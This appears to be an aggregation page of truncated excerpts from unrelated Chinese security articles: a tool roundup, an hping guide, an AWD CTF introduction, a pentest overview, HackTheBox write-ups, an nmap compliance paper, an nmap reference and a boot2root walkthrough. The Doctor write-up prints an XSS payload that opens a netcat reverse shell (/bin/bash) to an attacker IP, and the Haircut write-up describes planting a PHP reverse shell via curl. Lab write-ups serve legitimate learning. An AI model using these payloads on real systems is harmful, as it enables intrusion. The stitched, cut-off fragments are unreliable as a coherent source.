nmap

高质量的安全文章，安全offer面试经验分享 尽在 # 掌控安全EDU # 作者：掌控安全学员-xiaoc 修复百度云链接，新增shiro反序列化检测工具（在网盘链接里） 还有众多工具：公众号后台回复“zkaq”获取下载 0.1 话说 之前发表过此文章，但是觉得很多不足，想改改， 奈何最近项目事情太多，一直拖到现在。稍微修改一下，总是觉得差点什么。 等等慢慢改吧，大家多提意见。 0.2 正文 每年一度的HVV已经接近尾声，有幸参加过几次蓝队也做过几次红队，想着写点什么。 看到群里一些兄弟在要一些工具 ，就分享 一些经常使用工具吧。 pass: 不知道为何，越来越觉得自己像一个工具小子了。 希望大家在使用一些工具之余，去探究一些工具的原理，以及如何用代码去实现。 另外本文推荐的工具，在平常的渗透测试过程之中也有很大的用处。 所有的工具打包上传 ， 后台回复“工具”获取 。大家先耐心查看即可 1.信息收集篇 1.1 端口收集之railgun 先看看他的样子， 其实railgun是一个相对综合点的工具，或者说扫描器。 一般我是用它来做端口扫描，这款工具也是在做端口扫描的时候接触到的，发现挺不错。 到这里肯定有人会问：为什么不用nmap呢？ 其实主要的原因是因为nmap太慢， 而且不到最后nmap不出结果也不能查看 令人意外的是，这款工具扫描的结果比nmap还全。 这里多说一句

一、原理基础 Hping是一个命令行下使用的TCP/IP数据包组装/分析工具，其命令模式很像Unix下的ping命令，但是它不是只能发送ICMP回应请求，它还可以支持TCP、UDP、ICMP和RAW-IP协议，它有一个路由跟踪模式，能够在两个相互包含的通道之间传送文件。Hping常被用于检测网络和主机，其功能非常强大，可在多种操作系统下运行，如Linux，FreeBSD，NetBSD，OpenBSD，Solaris，MacOs X，Windows。 HPING和ping的区别：典型ping程序使用的是ICMP回显请求来测试，而HPING可以使用任何IP报文，包括ICMP、TCP、UDP、RAWSOCKET。 Hping的主要功能有： 防火墙测试 实用的端口扫描 网络检测，可以用不同的协议、服务类型(TOS)、IP分片 手工探测MTU(最大传输单元)路径 先进的路由跟踪，支持所有的协议 远程操作系统探测 远程的运行时间探测 TCP/IP堆栈审计 二、安装 Centos yum install hping Debian/Ubuntu apt-get install hping 三、Hping的详细参数 -h —help 显示帮助信息 -v —version 显示Hping的版本信息 -c —count 指定数据包的次数 -i —interval 指定发包间隔为多少毫秒，如-i m10

前言 本文来自玄魂工作室--玄说安全内部培训圈成员 欢迎点击文末链接关注他的微信订阅号 在上一篇文章中，我们说到了一个非常有意思的模式： AWD(Attack With Defense，攻防兼备)模式。 你需要在一场比赛里要扮演攻击方和防守方，攻者得分，失守者会被扣分。 也就是说，攻击别人的靶机可以获取 Flag 分数时，别人会被扣分，同时你也要保护自己的主机不被别人得分，以防扣分。 没接触过的同学第一次玩这种模式时，很可能都是一脸懵逼，最近我也打了一次由 玄魂 组织的、比较简单的小型 AWD，借 NeverSec 公众号来介绍一下一般的 AWD 比赛流程和所需准备的地方。由于我负责 Web 比较多，因此这篇文章不会涉及到二进制方面，主要从 Web 方向介绍。 AWD流程 1. 出题方会给每一支队伍部署同样环境的主机，主机有一台或者多台。 2. 拿到机器后每个队伍会有一定的加固时间或没有加固时间，这个视规则而定。 3. 每个服务、数据库、主机上都会可能存在 flag 字段，并且会定时刷新。通过攻击拿到 flag 后需要提交到裁判机进行得分，一般会提供指定的提交接口。下一轮刷新后，如果还存在该漏洞，可以继续利用漏洞获取 flag 进行得分。 通常来说，如果攻防赛时间比较短的话，一般只会考核 Web 、数据库的渗透、已有漏洞的利用；如果时间较长，很可能还需要做内网渗透，由于这块比较深入

前 言 熟悉军事的朋友都应该了解，各个国家的军队每年都会组织一些军事演习来检验部 队的攻防战术和作战能力，在美国，一般会将美军称为蓝军，将假想敌称为红军，这种军事演戏的方式，也在上个世纪90年代引入美军的网络安全和信息基础设施的实际攻防测试过程。由 一群接受过 职业培训的安全专家作为红方，对防御方蓝方进行安全攻击，以实战的方式来检验目标系统的防御体系和应急响应计划的有效性，这种通过实际的攻击方式进行安全测试和评估的方法就是安全渗透测试。 在20世纪90年代后期，逐步开始从军队和情报部门拓展到安全界，一些对安全需求很高的企业开始采用这种方式来对他们的网络和系统进行测试 。 一 、渗透测试概述 所谓渗透测试是借助各种漏洞扫描工具，通过模拟黑客的攻击方 法来对网络安全进行评估。 渗透测试类型 选择的渗透测试类型取决于公司和组织的用途和范围 - 他们是否想要模拟员工，网络管理员或外部来源的攻击。通常，有三种不同类型的渗透测试： 黑盒测试 ： 是指对基础设施不知情的情况下进行测试。黑盒测试比较费时费力，同时要求渗透测试者具备较高的技术能力； 白盒测试： 是指在完全了解结构的情况下进行的测试。白盒测试能比黑盒测试消除更多的目标的安全漏洞，给客户带来更大的价值。白盒测试最大的问题在于无法有效的测试客户的应急响应程序，无法判断客户的安全防护计划对检测特定的统计的效率； 灰盒测试 ：

本篇文章仅用于技术交流学习和研究的目的，严禁使用文章中的技术用于非法目的和破坏，否则造成一切后果与发表本文章的作者无关 靶机是作者购买VIP使用退役靶机操作，显示IP地址为10.10.10.24 nmap -p- --min-rate=1000 10.10.10.24 nmap -sC -sV -p 22,80 -oN haircut.nmap 10.10.10.24 nmap扫描结果 根据扫描出来的结果，访问下80端口 得到上没啥用的页面，只能wfuzz快速爆破下目录和文件 gobuster dir -u 10.10 . 10.24 -w /usr/share/wordlists/dirbuster/directory-list- 2.3 -medium.txt -x php,html,txt -t 500 发现文件exposed.php 访问一下 按照上面的提示点击了下Go 访问了下 根据上面的页面显示有经验的话，就知道这是curl执行的结果显示，那么猜测目标靶机此功能是调用了curl，那么我们可以使用curl命令直接下载一个php反弹shell代码，然后访问此反弹shell代码，指定路径就按照默认路径尝试，况且上面也爆破出来了目录uploads ，使用burpsuite直接操作 然后访问上传的文件，本地kali监听端口，成功反弹shell 下载提权检查脚本

HTB Doctor（Easy） 地址：https://www.hackthebox.eu/home/machines/profile/278 基本信息 在进行渗透之前需要将HTB与kali进行连接，建立连接之后才可以进行渗透 一、信息收集 靶机地址为10.10.10.209 使用nmap对靶机进行扫描 nmap - sC - sV - sT - O - A 10.10 .10 .209 开放了22,80,8089三个端口 8089对应的服务为splunk 二、访问80端口 需要添加一条hosts命令才可以访问其他内容 三、访问doctors.htb vim hosts 10.10 .10 .209 doctors . htb 进入页面后尝试万能登陆密码，但是失败了 注册用户进行登录看看是否有可利用的信息，发现可能存在xss漏洞，可以构造xss代码反弹shell < img src = http : / / 10.10 .14 .3 / $ ( nc . traditional$ IFS - e$ IFS / bin / bash$ IFS '10.10.14.3' $ IFS '1234' ) > 成功反弹，获取交互式shell python3 - c 'import pty;pty.spawn("/bin/bash")' 进入home目录查看是否有可利用信息

利用端口扫描进行终端合规性检查的一个示例 摘要：大型的办公网络内往往运行着数量众多的终端，这些终端的安全又是网络管理员重点关注的问题，如何对使用人员开展信息安全教育以及采取哪种技术防御措施是很多文章研究的内容，但是这些防御措施是否有效？员工是否按规定使用终端呢？本文利用端口扫描技术，针对终端应用程序检查提供了一个示例，为网络管理员对终端进行合规性检查提供了一个思路。 关键字：端口扫描； Nmap ；终端合规性 1 、背景 现代大型公司往往都有自己的内部办公网络，根据公司业务的规模及分布，有的办公网络集中于某个地区，有的则跨省跨国。使用计算机网络的地方就必须考虑安全问题，这是计算机网络发展多年以来大家早已达成的共识。面对公司规模庞大、主机众多的网络，我们怎么能够快速检查，找到那些存在安全隐患的主机？这是网络管理员躲避不了的问题。目前人们对于内网安全的研究比较广泛，总结起来大致是三个方面： 1 ）加强员工安全意识教育； 2 ）提高终端安全管理水平； 3 ）完善终端安全防护措施。【 1 】笔者认为除了正面防御之外，还应考虑检查手段，不然无法验证我们的防御手段是否有效。考虑到完整的***测试未必适用于每个公司，因此本文提出利用端口扫描进行终端合规性检查的办法，并举例说明。希望以点带面、抛砖引玉，促进网络管理人员对内网安全的思考。 2 、端口及端口扫描 端口只是一种软件中的抽象概念

nmap命令 　　是一款开放源代码的网络探测和安全审核工具，是Network Mapper的缩写。其设计目标是快速地扫描大型网络。nmap可以发现网络上有哪些主机，主机提供了什么服务（应用程序名称和版本号），并探测操作系统的类型及版本信息。 如果系统没有nmap命令，则可以使用下面的命令来安装： 　　nmap [Scan Type] [option] (target specification) 扫描目标可以为IP地址、子网地址等，如192.168.1.2或10.0.0.0/24。 nmap命令的参数选项及说明 -sS TCP同步扫描（TCP SYN） -ST TCP连接扫描 -sn 不进行端口扫描，只检查主机正在运行。该选项与老版本的-sP相同 -sU 扫描UDP端口 -sV 探测服务版本信息 -Pn 只进行扫描，不ping主机 -PS 使用SYN包对目标主机进行扫描。默认是80端口，也可以指定端口，格式为-PS22或-PS22-25,80,113,1050,35000，记住PS和端口号之间不要有空格 -PU 使用udp ping扫描端口 -O 激活对TCP/IP指纹特征（fingerprinting）的扫描，获得远程主机的标志，也就是操作系统类型 -V 显示扫描过程中的详细信息* -S<IP> 设置扫描的源IP地址 -g port 设置扫描的源端口 -oN

靶机说明 NinevehV0.3.7z是一个难度为初级到中级的BooT2Root/CTF挑战。 VM虚机配置有静态IP地址（192.168.0.150） 目标 Boot to root：获得root权限，查看flag。 运行环境 靶机：静态IP是192.168.0.150。 攻击机：同网段下有kali攻击机（物理机），IP地址：192.168.0.128，安装有Nmap、Burpsuit、Wireshark、Sqlmap、nc、Python2.7、JDK、DirBuster、AWVS、Nessus等渗透工具，也可以使用windows攻击机。 信息收集 端口服务识别 启动NinevehV0.3.7z虚拟机，由于IP已知，使用nmap扫描端口，并做服务识别和深度扫描（加-A参数），命令： nmap -T4 -A -p 1-65535 192.168.0.150 发现只开放了80和443这2个端口，但是后面有一个ssl-cert 也就是ssl证书 比较敏感也就是443端口， 我们先访问 http://192.168.0.150 HTTP协议传输的数据都是未加密的，也就是明文的，因此使用HTTP协议传输隐私信息非常不安全，为了保证这些隐私数据能加密传输，于是网景公司设计了SSL（Secure Sockets Layer）协议用于对HTTP协议传输的数据进行加密，从而就诞生了HTTPS。